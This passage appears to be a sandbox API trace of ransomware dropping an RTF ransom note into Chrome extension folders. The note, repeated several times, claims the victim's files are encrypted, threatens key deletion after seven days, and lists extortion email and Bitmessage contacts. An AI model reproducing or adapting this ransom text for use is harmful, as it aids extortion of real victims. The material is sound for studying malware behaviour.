s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.350] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.350] CloseHandle (hObject=0x294) returned 1 [0273.351] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0273.351] GetLastError () returned 0x2 [0273.351] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s 